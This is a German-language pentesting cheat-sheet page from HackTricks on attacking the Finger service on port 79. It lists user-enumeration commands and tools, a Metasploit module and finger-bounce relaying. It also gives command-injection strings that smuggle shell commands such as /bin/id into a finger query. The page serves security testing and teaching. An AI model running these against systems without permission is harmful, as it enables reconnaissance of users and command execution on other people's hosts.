79 - Pentesting Finger

Reading time: 2 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Grundinformationen

Das Finger-Programm/-Dienst wird verwendet, um Details über Computerbenutzer abzurufen. Typischerweise umfasst die bereitgestellte Information den Benutzernamen, den vollständigen Namen und in einigen Fällen zusätzliche Details. Diese zusätzlichen Details können den Bürostandort und die Telefonnummer (sofern verfügbar), die Zeit, zu der sich der Benutzer angemeldet hat, die Inaktivitätsdauer (Leerlaufzeit), den letzten Zeitpunkt, an dem die E-Mail vom Benutzer gelesen wurde, sowie den Inhalt der Plan- und Projektdateien des Benutzers umfassen.

Standardport: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeration

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Benutzerauszählung

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativ können Sie finger-user-enum von pentestmonkey verwenden, einige Beispiele:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap führt ein Skript aus, um Standard-Skripte zu verwenden

Metasploit verwendet mehr Tricks als Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Befehlsausführung

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Verwenden Sie ein System als Finger-Relay

finger user@host@victim
finger @internal@external

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks